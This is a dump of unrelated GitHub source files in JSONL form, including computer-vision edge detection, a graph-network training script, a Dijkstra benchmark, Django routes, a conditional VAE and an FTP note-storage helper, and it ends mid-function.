\"\"\"\n # x = - b / (a - lambda1)\n # x[np.isnan(x)] = 0\n # y = np.ones((1200, 1600))\n # y[np.isnan(x)] = 0\n #\n # denom = np.sqrt(np.square(x) + 1)\n # dx = x / denom\n # dy = 1.0 / denom\n # return dx, dy\n return -b, a - lambda1\n\n\ndef quiver_visualization(dx, dy, title):\n \"\"\"\n Plot quiver visualization plot given dx, dy\n \"\"\"\n step = 50\n fig, ax = plt.subplots(figsize=(8, 8))\n dx = dx[::step, ::step]\n dy = dy[::step, ::step]\n ax.quiver(dx, dy)\n ax.set_aspect('equal')\n ax.title.set_text(title)\n\n\ndef quiver_for_color(bx, by, gx, gy, rx, ry):\n \"\"\"\n Calculate gradients of color image given gradients in b, g, r channel in X and Y-axis.\n \"\"\"\n dx = bx + gx + rx\n dy = by + gy + ry\n quiver_visualization(\n dx, dy, title=\"Gradient visualization for color image\")\n\n\ndef quiver_for_gray(img):\n \"\"\"\n Calculate gradients of gray image given gradients in X and Y-axis.\n \"\"\"\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n dx, dy = get_gradients(gray_img)\n quiver_visualization(\n dx, dy, title=\"Gradient visualization for grayscale image\")\n\n\ndef non_maximum_suppression(magnitudes, angles):\n \"\"\"\n Does non-maximum suppresion based on gradient magnitudes and orientation\n returns:\n gmax: the activation after non-maximum-suppression\n \"\"\"\n gmax = np.zeros(magnitudes.shape)\n for i in range(gmax.shape[0]):\n for j in range(gmax.shape[1]):\n if angles[i][j] < 0:\n angles[i][j] += 360\n\n if ((j + 1) < gmax.shape[1]) and ((j - 1) >= 0) and ((i + 1) < gmax.shape[0]) and ((i - 1) >= 0):\n # 0 degrees\n if (angles[i][j] >= 337.5 or angles[i][j] < 22.5) or (angles[i][j] >= 157.5 and angles[i][j] < 202.5):\n if magnitudes[i][j] >= magnitudes[i][j + 1] and magnitudes[i][j] >= magnitudes[i][j - 1]:\n gmax[i][j] = magnitudes[i][j]\n # 45 degrees\n if (angles[i][j] >= 22.5 and angles[i][j] < 67.5) or (angles[i][j] >= 202.5 and angles[i][j] < 247.5):\n if magnitudes[i][j] >= magnitudes[i - 1][j + 1] and magnitudes[i][j] >= magnitudes[i + 1][j - 1]:\n gmax[i][j] = magnitudes[i][j]\n # 90 degrees\n if (angles[i][j] >= 67.5 and angles[i][j] < 112.5) or (angles[i][j] >= 247.5 and angles[i][j] < 292.5):\n if magnitudes[i][j] >= magnitudes[i - 1][j] and magnitudes[i][j] >= magnitudes[i + 1][j]:\n gmax[i][j] = magnitudes[i][j]\n # 135 degrees\n if (angles[i][j] >= 112.5 and angles[i][j] < 157.5) or (angles[i][j] >= 292.5 and angles[i][j] < 337.5):\n if magnitudes[i][j] >= magnitudes[i - 1][j - 1] and magnitudes[i][j] >= magnitudes[i + 1][j + 1]:\n gmax[i][j] = magnitudes[i][j]\n return gmax\n\n\ndef plot_hist(hist1, label1=\"label\"):\n \"\"\"\n Plots a histogram. Helper function for analysing.\n \"\"\"\n plt.plot(hist1, label=label1)\n plt.show()\n\n\ndirectory = 'ST2MainHall4/'\n# filename = 'ST2MainHall4001.jpg'\nfilename = 'human3.tif'\nimg = cv2.imread(directory + filename)\ncv2.imshow(\"Original image\", img)\n# Gradient visualization for grayscale image\nquiver_for_gray(img)\n\n# gradients for color image for every channel\nbx, by, gx, gy, rx, ry = get_bgrimg_gradients(img)\n# Gradient visualization for color image\nquiver_for_color(bx, by, gx, gy, rx, ry)\n# compute structure matrix\na, b, c = compute_structure_matrix(bx, by, gx, gy, rx, ry)\n# trace, edge_strengths\nmagnitudes = a + c\n# eigenvalues\nlambda1, lambda2 = compute_eigen_values(\n a, b, c)\n# eigen vectors orientation\ndx, dy = get_edge_direction(a, b, lambda1)\n# magnitude and angles of eigenvectors\nmagnitudes, angles = cv2.cartToPolar(dx, dy, angleInDegrees=True)\n# scalling magnitudes from 0 to 255\nmagnitudes = scale(magnitudes, 0, 255)\n\n# edges after non_maximum_suppression\nedges = non_maximum_suppression(magnitudes, angles)\n# cv2.imshow(\"after non max\", edges)\n# print(edges.min())\n# print(edges.max())\n# hist, bins = np.histogram(edges.ravel(), bins=256)\n# hist[0:127] = 0\n# print(hist)\n# plot_hist(hist)\n\n# appling hysteresis threshold\nlow = 0\nhigh = 1.7\nhighest = (edges > high).astype(int)\nour_edges = filters.apply_hysteresis_threshold(edges, low, high)\nfig, ax = plt.subplots(nrows=1, ncols=1)\nax.imshow(highest + our_edges, cmap='magma')\nplt.tight_layout()\n\nplt.show()\ncv2.waitKey(0)\n","repo_name":"akabiraka/cs682_computer_vision","sub_path":"hw3/extra_credit.py","file_name":"extra_credit.py","file_ext":"py","file_size_in_byte":7341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33735281053","text":"import tensorflow as tf\nif tf.__version__.split(\".\")[0]=='2':\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n import tensorflow.compat.v1.logging as logging\nimport numpy as np\nimport joblib\nimport time\nimport json\nimport argparse\nimport os\n\nfrom kgcn.gcn import NumPyArangeEncoder\nfrom kgcn.gcn import get_default_config, load_model_py\nfrom kgcn.data_util import load_and_split_data, load_data\nfrom kgcn.core import CoreModel\nfrom kgcn.feed_index import construct_feed\n\n\ndef print_ckpt(sess, ckpt):\n #checkpoint = tf.train.get_checkpoint_state(args.ckpt)\n print(\"==\", ckpt)\n for var_name, _ in tf.contrib.framework.list_variables(ckpt):\n var = tf.contrib.framework.load_variable(ckpt, var_name)\n print(var_name, var.shape)\n print(\"==\")\n\n\ndef print_variables():\n # print variables\n print('== neural network')\n vars_em = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n for v in vars_em:\n print(v.name, v.shape)\n print(\"==\")\n\n\ndef restore_ckpt(sess, ckpt):\n saver = tf.train.Saver()\n tf.logging.info(f\"[LOAD]{ckpt}\")\n try:\n saver.restore(sess, ckpt)\n except:\n print(\"======LOAD ERROR======\")\n print_variables()\n print_ckpt(sess, ckpt)\n raise Exception\n return saver\n\n\ndef get_pos_weight(data):\n adjs = data.adjs\n ws = []\n for adj in adjs:\n for ch, a in enumerate(adj):\n num = a[2][0]\n num_all = num*num\n num_pos = len(a[0])\n num_neg = num_all-num_pos\n ws.append(num_neg/num_pos)\n return np.mean(ws)\n\n\ndef get_norm(data):\n adjs = data.adjs\n ws = []\n for adj in adjs:\n for ch, a in enumerate(adj):\n num = a[2][0]\n num_all = num*num\n num_pos = len(a[0])\n num_neg = num_all-num_pos\n ws.append(num_all/num_neg*2)\n return np.mean(ws)\n\n\ndef train(sess, config):\n if config[\"validation_dataset\"] is None:\n all_data, train_data, valid_data, info = load_and_split_data(config, filename=config[\"dataset\"],\n valid_data_rate=config[\"validation_data_rate\"])\n else:\n print(\"[INFO] training\")\n train_data, info = load_data(config, filename=config[\"dataset\"])\n print(\"[INFO] validation\")\n valid_data, valid_info = load_data(config, filename=config[\"validation_dataset\"])\n info[\"graph_node_num\"] = max(info[\"graph_node_num\"], valid_info[\"graph_node_num\"])\n info[\"graph_num\"] = info[\"graph_num\"] + valid_info[\"graph_num\"]\n # train model\n graph_index_list = []\n for i in range(info[\"graph_num\"]):\n graph_index_list.append([i, i])\n info.graph_index_list = graph_index_list\n info.pos_weight = get_pos_weight(train_data)\n info.norm = get_norm(train_data)\n print(f\"pos_weight={info.pos_weight}\")\n print(f\"norm={info.norm}\")\n\n model = CoreModel(sess, config, info, construct_feed_callback=construct_feed)\n load_model_py(model, config[\"model.py\"])\n\n vars_to_train = tf.trainable_variables()\n for v in vars_to_train:\n print(v)\n\n # Training\n start_t = time.time()\n model.fit(train_data, valid_data)\n train_time = time.time() - start_t\n print(f\"training time:{train_time}[sec]\")\n # Validation\n start_t = time.time()\n validation_cost, validation_accuracy, validation_prediction_data = model.pred_and_eval(valid_data)\n training_cost, training_accuracy, training_prediction_data = model.pred_and_eval(train_data)\n infer_time = time.time() - start_t\n print(f\"final cost(training ) = {training_cost}\\n\"\n f\"accuracy (training ) = {training_accuracy['accuracy']}\\n\"\n f\"final cost(validation) = {validation_cost}\\n\"\n f\"accuracy (validation) = {validation_accuracy['accuracy']}\\n\"\n f\"infer time:{infer_time}[sec]\\n\")\n # Saving\n if config[\"save_info_valid\"] is not None:\n result = {}\n result[\"validation_cost\"] = validation_cost\n result[\"validation_accuracy\"] = validation_accuracy[\"accuracy\"]\n result[\"train_time\"] = train_time\n result[\"infer_time\"] = infer_time\n save_path = config[\"save_info_valid\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4)\n\n if config[\"save_info_train\"] is not None:\n result = {}\n result[\"test_cost\"] = training_cost\n result[\"test_accuracy\"] = training_accuracy[\"accuracy\"]\n result[\"train_time\"] = train_time\n save_path = config[\"save_info_train\"]\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n print(f\"[SAVE] {save_path}\")\n with open(save_path, \"w\") as fp:\n json.dump(result, fp, indent=4, cls=NumPyArangeEncoder)\n\n if \"reconstruction_valid\" in config:\n filename = config[\"reconstruction_valid\"]\n print(os.path.dirname(filename))\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(validation_prediction_data, filename)\n if \"reconstruction_train\" in config:\n filename = config[\"reconstruction_train\"]\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(training_prediction_data, filename)\n\n\ndef reconstruct(sess, config):\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n all_data, info = load_data(config, filename=dataset_filename)\n\n graph_index_list = []\n for i in range(all_data.num):\n graph_index_list.append([i, i])\n info.graph_index_list = graph_index_list\n info.pos_weight = get_pos_weight(all_data)\n info.norm = get_norm(all_data)\n print(f\"pos_weight={info.pos_weight}\")\n print(f\"norm={info.norm}\")\n\n model = CoreModel(sess, config, info, construct_feed_callback=construct_feed)\n load_model_py(model, config[\"model.py\"], is_train=False)\n\n vars_to_train = tf.trainable_variables()\n for v in vars_to_train:\n print(v)\n\n # initialize session\n restore_ckpt(sess, config[\"load_model\"])\n\n start_t = time.time()\n cost, acc, pred_data = model.pred_and_eval(all_data)\n recons_data = pred_data\n \"\"\"\n recons_data=[]\n for i in range(3):\n print(i)\n cost,acc,pred_data=model.pred_and_eval(all_data)\n recons_data.append(pred_data)\n \"\"\"\n if \"reconstruction_test\" in config:\n filename = config[\"reconstruction_test\"]\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(recons_data, filename)\n\n\ndef generate(sess, config):\n dataset_filename = config[\"dataset\"]\n if \"dataset_test\" in config:\n dataset_filename = config[\"dataset_test\"]\n all_data, info = load_data(config, filename=dataset_filename)\n\n graph_index_list = []\n for i in range(all_data.num):\n graph_index_list.append([i, i])\n info.graph_index_list = graph_index_list\n info.pos_weight = get_pos_weight(all_data)\n info.norm = get_norm(all_data)\n print(f\"pos_weight={info.pos_weight}\")\n print(f\"norm={info.norm}\")\n\n model = CoreModel(sess, config, info, construct_feed_callback=construct_feed)\n load_model_py(model, config[\"model.py\"], is_train=False)\n # initialize session\n saver = tf.train.Saver()\n #sess.run(tf.global_variables_initializer())\n restore_ckpt(sess, config[\"load_model\"])\n\n start_t = time.time()\n cost, acc, pred_data = model.pred_and_eval(all_data)\n generated_data = pred_data\n\n if \"generation_test\" in config:\n filename = config[\"generation_test\"]\n dirname = os.path.dirname(filename)\n if dirname != \"\":\n os.makedirs(dirname, exist_ok=True)\n print(f\"[SAVE] {filename}\")\n joblib.dump(generated_data, filename)\n\n\ndef main():\n seed = 1234\n np.random.seed(seed)\n tf.set_random_seed(seed)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('mode', type=str,\n help='train/infer')\n parser.add_argument('--config', type=str,\n default=None,\n nargs='?',\n help='config json file')\n parser.add_argument('--save-config',\n default=None,\n nargs='?',\n help='save config json file')\n parser.add_argument('--no-config',\n action='store_true',\n help='use default setting')\n parser.add_argument('--model', type=str,\n default=None,\n help='model')\n parser.add_argument('--dataset', type=str,\n default=None,\n help='dataset')\n parser.add_argument('--gpu', type=str,\n default=None,\n help='constraint gpus (default: all) (e.g. --gpu 0,2)')\n parser.add_argument('--cpu',\n action='store_true',\n help='cpu mode (calcuration only with cpu)')\n\n args = parser.parse_args()\n # config\n config = get_default_config()\n if args.config is None:\n pass\n #parser.print_help()\n #quit()\n else:\n print(\"[LOAD] \", args.config)\n fp = open(args.config, 'r')\n config.update(json.load(fp))\n # option\n if args.model is not None:\n config[\"load_model\"] = args.model\n if args.dataset is not None:\n config[\"dataset\"] = args.dataset\n # gpu/cpu\n if args.cpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n elif args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n # setup\n with tf.Graph().as_default():\n #with tf.Graph().as_default(), tf.device('/cpu:0'):\n with tf.Session(config=tf.ConfigProto(log_device_placement=False)) as sess:\n # mode\n if args.mode == \"train\":\n train(sess, config)\n elif args.mode == \"reconstruct\":\n reconstruct(sess, config)\n elif args.mode == \"generate\":\n generate(sess, config)\n if args.save_config is not None:\n print(f\"[SAVE] {args.save_config}\")\n fp = open(args.save_config, \"w\")\n json.dump(config, fp, indent=4)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clinfo/kGCN","sub_path":"gcn_gen.py","file_name":"gcn_gen.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"34513853315","text":"# Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário\n# escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal.\n\nnum = int(input('Escreva um número: '))\nchoice = int(input('Digite'\n '\\n1 para binário '\n '\\n2 para octal '\n '\\n3 para hexadecimal'\n '\\n'))\n\nif choice == 1:\n print('O número {} em binário fica {}.'.format(num, bin(num)))\nelif choice == 2:\n print('O número {} em octal fica {}'.format(num, oct(num)))\nelif choice == 3:\n print('O número {} em hexadecimal fica {}.'.format(num, hex(num)))\nelse:\n print('Você não escolheu nenhuma das opções. \\nAssim não da!')\n","repo_name":"amandacordeiro/Exercicios-Python","sub_path":"ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26485107158","text":"from django.conf.urls import url\n\nfrom questionnaire import views\n\n\nurlpatterns = [\n url(r'^$', views.dashboard, name='dashboard'),\n url(r'^clients/followup/day7/$', views.followup_day7, name='followup-day7'),\n url(r'^clients/followup/day28/$', views.followup_day28, name='followup-day28'),\n url(r'^clients/followup/missed_visit2/$', views.missed_visit2, name='missed_visit2'),\n url(r'^clients/followup/reminders/$', views.followup_day3, name='reminders'),\n url(r'^forms/$', views.form_listing, name='form-listing'),\n url(r'^new/$', views.manage_form, name='form-create'),\n url(r'^(?P[-\\w]+)/$', views.manage_form, name='form-update'),\n url(r'^(?P[-\\w]+)/editor/$', views.form_editor, name='form-editor'),\n url(r'^(?P[-\\w]+)/data/$', views.data_listing, name='data-listing'),\n url(r'^(?P[-\\w]+)/export/$', views.export_form_data, name='data-export'),\n url(r'^(?P[-\\w]+)/new$', views.form_display, name='data-create'),\n url(r'^(?P[-\\w]+)/(?P[-\\w]+)/$', views.form_display, name='data-update'),\n]\n","repo_name":"mhegelele/ccbr_maternal","sub_path":"questionnaire/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21906517335","text":"#!/usr/bin/env python3\nimport time\n\nINFINITY = 0x7f7f7f7f\nedges = {}\n\ndef key(i, j):\n return str(i) + \", \" + str(j)\n\ndef dijkstra(nv, src, dest):\n '''dijkstra'''\n dist = {}\n visited = {}\n for i in range(nv):\n dist[i] = edges[key(src, i)]\n visited[i] = 0\n\n visited[src] = 1\n for i in range(1, nv):\n min_value = INFINITY\n for j in range(nv):\n if(visited[j] == 0 and (dist[j] < min_value)):\n min_value = dist[j]\n min_index = j\n\n visited[min_index] = 1\n for k in range(nv):\n if(visited[k] == 0 and dist[k] > (dist[min_index] + edges[key(min_index, k)])):\n dist[k] = dist[min_index] + edges[key(min_index, k)]\n\n return dist[dest]\n\nwith open('edges.txt', 'r') as f:\n first_line = f.readline()\n n = int(first_line.split()[0])\n for i in range(n):\n for j in range(n):\n edges[key(i, j)] = INFINITY\n for line in f:\n tokens = line.split()\n i = int(tokens[0])\n j = int(tokens[1])\n dist = int(tokens[2])\n edges[key(i, j)] = dist\n\nstart = time.time()\nfor i in range(10):\n dijkstra(n, 0, n-1)\nprint(\"python running time: \" + str(time.time() - start))\n\n","repo_name":"yuanboli/practice","sub_path":"template/dijkstra_backup.py","file_name":"dijkstra_backup.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74693110313","text":"import sys\n\ninput = sys.stdin.readline\n\ndef binary_search(arr, start, end, target):\n while start <= end:\n mid = (start + end) // 2\n if arr[mid] == target:\n return True\n elif arr[mid] < target:\n start = mid+1\n else:\n end = mid-1\n return False\n\n\nn = int(input())\nn_list = sorted(map(int, input().split()))\nm = int(input())\nm_list = map(int, input().split())\n\nfor m_item in m_list:\n result = binary_search(n_list, 0, n-1, m_item)\n if result:\n print(1)\n else:\n print(0)\n","repo_name":"CoodingPenguin/problem-solving","sub_path":"boj/1920_수찾기.py","file_name":"1920_수찾기.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10377080499","text":"#! /usr/bin/env python3\n\nimport lib\n\nclass ErrorHandler(object):\n def __enter__(self):\n pass\n\n def __exit__(self, error_type, error_args, traceback):\n if error_type is None:\n return\n if error_type is lib.gui.tk.TclError:\n print(\"WARNING: A GUI-related `TclError` error occurred:\"\n , error_args)\n return True\n if issubclass(error_type, Exception):\n lib.gui.Message(message=repr(error_args)\n , icon='warning'\n , title='Gomoku - Error').show()\n return False\n\nif __name__ == '__main__':\n main_window = lib.gui.MainWindow(15, 15)\n with ErrorHandler():\n main_window.mainloop()\n","repo_name":"storandrew/Renju","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10421112929","text":"\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.parallel\r\nimport torch.utils.data\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nimport argparse\r\n\r\n\r\n\r\n\r\nclass VAE(nn.Module):\r\n def __init__(self):\r\n super(VAE, self).__init__()\r\n self.encoder_conv = nn.Sequential(\r\n nn.Conv1d(1,16,kernel_size=3,stride=2,padding=1),\r\n nn.LeakyReLU(0.2,inplace=True), #(89+2*1-3)/2+1=43\r\n\r\n nn.Conv1d(16,32,kernel_size=3,stride=2,padding=1), \r\n nn.LeakyReLU(0.2,inplace=True), #(43+2*1-3)/2+1=22\r\n\r\n nn.Conv1d(32,32,kernel_size=3,stride=2,padding=1),\r\n nn.LeakyReLU(0.2,inplace=True), #(22+2*1-3)/2+1=12\r\n )\r\n self.encoder_fc1=nn.Linear(32*12,nz)\r\n self.encoder_fc2=nn.Linear(32*12,nz)\r\n self.decoder_fc = nn.Linear(nz+3,32 * 12)\r\n self.decoder_deconv = nn.Sequential( \r\n nn.ConvTranspose1d(32, 16, 2, 2, 1),#2*(12-1)+2-2*1=22\r\n nn.ReLU(inplace=True), \r\n nn.ConvTranspose1d(16, 16, 3, 2, 1),#2*(22-1)+3-2*1=43\r\n nn.ReLU(inplace=True),\r\n nn.ConvTranspose1d(16, 1, 2, 2, 0),#2*(43-1)+2-2*0=86\r\n nn.ReLU(inplace=True),\r\n )\r\n\r\n\r\n def noise_reparameterize(self,mean,logvar):\r\n eps = torch.randn(mean.shape).to(device)\r\n z = mean + eps * torch.exp(logvar)\r\n return z\r\n\r\n def forward(self, x,label):\r\n z ,mean.logstd= self.encoder(x,label)\r\n output = self.decoder(z,label)\r\n return output\r\n def encoder(self,x,label):#[b,1,86] [b,1,3] =[b,1,89] \r\n label=torch.unsqueeze(label,1)\r\n x=torch.cat([x,label], axis=2)\r\n out1, out2 = self.encoder_conv(x), self.encoder_conv(x)\r\n # print(out1.size())\r\n mean = self.encoder_fc1(out1.view(out1.shape[0], -1))\r\n logstd = self.encoder_fc2(out2.view(out2.shape[0], -1))\r\n z = self.noise_reparameterize(mean, logstd)\r\n return z,mean,logstd\r\n def decoder(self,z,label):\r\n z=torch.cat([z,label], axis=1)\r\n out3 = self.decoder_fc(z)\r\n out3= nn.ReLU()(out3)\r\n out3 = out3.view(out3.shape[0], 32, -1)\r\n out3 = self.decoder_deconv(out3)\r\n return out3\r\n\r\n\r\n\r\nlb = LabelBinarizer()\r\n\r\ndef to_categrical(y):\r\n lb.fit(list(range(1,4)))\r\n y_one_hot =lb.transform(y)\r\n y_one_hot=torch.tensor(y_one_hot).type(torch.FloatTensor)\r\n return y_one_hot\r\n\r\n\r\nspecies1=['H', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'K', 'Ca', 'Sc', 'Ti', 'V', \r\n 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', \r\n 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', \r\n 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', \r\n 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu']\r\n\r\n\r\ndef get_fumal(array,label):\r\n gen_im=array.detach().cpu()\r\n gen_im=gen_im.view(-1,86)\r\n array=np.array(gen_im[0])\r\n\r\n f=str()\r\n for i,j in enumerate(array):\r\n if float(str(j))>0:\r\n f=f+str(species1[i])+str(j)[:4]\r\n print(str(label),':',f)\r\n return f\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n # device = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\r\n # device = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\r\n\r\n\r\n print(\"=====> Setup model\")\r\n nz=20\r\n vae = VAE().to(device)\r\n vae=torch.load(r'ckp/VAE.pth')\r\n print('loading pretrained model')\r\n parser = argparse.ArgumentParser()\r\n Tc_dict={'high':2,'medium':1,'low':0}\r\n parser.add_argument('--num', type=int, default = 3500)\r\n parser.add_argument('--Tc', type=str, default='medium',choices=['high','medium','low'])\r\n args = parser.parse_args()\r\n print('Input Tc Condition',args.Tc)\r\n print('Input Num',args.num)\r\n\r\n with torch.no_grad():\r\n all_f=[]\r\n for i in range( args.num):\r\n label_onehot = torch.zeros((1, 3))\r\n label_onehot[:,Tc_dict[args.Tc]]=1\r\n z = torch.randn((1, 20)).to(device)\r\n output = vae.decoder(z,label_onehot.to(device))\r\n new_f=get_fumal(output,'new')\r\n all_f.append(new_f)\r\n all=pd.DataFrame(all_f)\r\n all.to_csv('low_fumal.csv')\r\n\r\n\r\n\r\n\r\n","repo_name":"852569069/SuperConductor-CVAEGAN","sub_path":"sample_generation.py","file_name":"sample_generation.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30906996319","text":"from conductr_cli.test.cli_test_case import CliTestCase, strip_margin, as_error\nfrom conductr_cli import sandbox_stop_docker, logging_setup\nfrom unittest.mock import patch, MagicMock\nfrom subprocess import CalledProcessError\n\n\nclass TestStop(CliTestCase):\n\n default_args = {\n 'local_connection': True,\n 'verbose': False,\n 'quiet': False,\n 'image_dir': '/Users/mj/.conductr/images'\n }\n\n def test_stop_containers(self):\n stdout = MagicMock()\n containers = ['cond-0', 'cond-1']\n\n with patch('conductr_cli.sandbox_common.resolve_running_docker_containers', return_value=containers), \\\n patch('conductr_cli.terminal.docker_rm') as mock_docker_rm:\n logging_setup.configure_logging(MagicMock(**self.default_args), stdout)\n sandbox_stop_docker.stop(MagicMock(**self.default_args))\n\n self.assertEqual(strip_margin(\"\"\"||------------------------------------------------|\n || Stopping ConductR |\n ||------------------------------------------------|\n |ConductR has been successfully stopped\n |\"\"\"), self.output(stdout))\n mock_docker_rm.assert_called_once_with(containers)\n\n def test_cannot_stop_containers(self):\n stdout = MagicMock()\n stderr = MagicMock()\n mock_docker_rm = MagicMock(side_effect=CalledProcessError(-1, 'test only'))\n containers = ['cond-0', 'cond-1']\n\n with patch('conductr_cli.sandbox_common.resolve_running_docker_containers', return_value=containers), \\\n patch('conductr_cli.terminal.docker_rm', mock_docker_rm):\n logging_setup.configure_logging(MagicMock(**self.default_args), stdout, stderr)\n sandbox_stop_docker.stop(MagicMock(**self.default_args))\n\n self.assertEqual(strip_margin(\"\"\"||------------------------------------------------|\n || Stopping ConductR |\n ||------------------------------------------------|\n |\"\"\"), self.output(stdout))\n self.assertEqual(\n as_error(strip_margin(\"\"\"|Error: ConductR containers could not be stopped\n |Error: Please stop the Docker containers manually\n |\"\"\")), self.output(stderr))\n mock_docker_rm.assert_called_once_with(containers)\n\n def test_stop_no_containers(self):\n stdout = MagicMock()\n containers = []\n\n with patch('conductr_cli.sandbox_common.resolve_running_docker_containers', return_value=containers), \\\n patch('conductr_cli.terminal.docker_rm') as mock_docker_rm:\n logging_setup.configure_logging(MagicMock(**self.default_args), stdout)\n sandbox_stop_docker.stop(MagicMock(**self.default_args))\n\n self.assertEqual('', self.output(stdout))\n mock_docker_rm.assert_not_called()\n","repo_name":"typesafehub/conductr-cli","sub_path":"conductr_cli/test/test_sandbox_stop_docker.py","file_name":"test_sandbox_stop_docker.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"15133742759","text":"x1,y1,x2,y2 = map(int,input().split())\r\n\r\nW,H = abs(x1-x2),abs(y1-y2)\r\n\r\n\r\n\r\nflip_x = x1 > x2\r\nflip_y = y1 > y2\r\n\r\nxo = min(x1,x2)\r\nyo = min(y1,y2)\r\n\r\nN = int(input())\r\n\r\nF = []\r\n\r\nfor i in range(N):\r\n x,y = map(int,input().split())\r\n x -= xo\r\n y -= yo\r\n if 0 <= x <= W and 0 <= y <= H:\r\n if flip_x:\r\n x = W-x\r\n if flip_y:\r\n y = H-y\r\n F.append((x,y))\r\n\r\nN = len(F)\r\n\r\nfrom math import pi\r\nfrom bisect import bisect\r\n\r\n\r\n#?????\r\nL = (W+H)*100\r\n\r\nif (W == 0 or H == 0) and F:\r\n L += pi*10-20\r\nelif N > 0:\r\n # find LIS\r\n F.sort()\r\n F = [y for x,y in F]\r\n\r\n dp = [H+1]*len(F)\r\n\r\n for i,f in enumerate(F):\r\n dp[bisect(dp,f)] = f\r\n\r\n n = bisect(dp,H)\r\n\r\n L -= (20-pi*5)*n\r\n if n == min(W,H) + 1:\r\n L += pi*5\r\n\r\nprint(L)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc019/C/1544282.py","file_name":"1544282.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"3808374788","text":"from lib.util import *\n\n\ndef master_append(id, ftp, path, titolo, autore, dataCalendario, tags):\n \"\"\"\n :param id: The id of the new note\n :type id: int\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n :type path: string\n :param titolo: The title of the note\n :type titolo: string\n :param autore: The author of the note\n :type autore: string\n :param dataCalendario: The date wich the note was written, should be gathered with time.time()\n :type dataCalendario: float\n :param tags: An arrays of strings containing the tags of the note\n :type tags: string array\n \"\"\"\n master_update(ftp)\n out = str(id) + \";\" + titolo + \";\" + autore + \";\" + str(dataCalendario) + \";0;;;\"\n x = -1\n for i in tags:\n x += 1\n out += i\n if (tags[x] != tags[-1]):\n out += \",\"\n out += \"\\n\"\n open(path, \"a\").write(out)\n ftp.storbinary(\"STOR master.txt\", open(path, \"rb\"))\n\n\ndef master_delete(ftp, path, id):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n :type path: string\n :param id: The id of the note to be deleted\n :type id: int\n \"\"\"\n master_update(ftp)\n line = 0\n x = -1\n with open(path) as f:\n for line_terminated in f:\n x += 1\n data = line_terminated.split(\";\")\n if (data[0] == id):\n line = x\n break\n with open(path, \"r\") as f:\n lines = f.readlines()\n lines[x] = \"\"\n with open(path, \"w\") as f:\n f.writelines(lines)\n ftp.storbinary(\"STOR master.txt\", open(path, \"rb\"))\n\n\ndef master_edit(ftp, path, id, index, new):\n \"\"\"\n :param ftp: The ftp object\n :type ftp: FTP\n :param path: Path where master.txt is located:\n 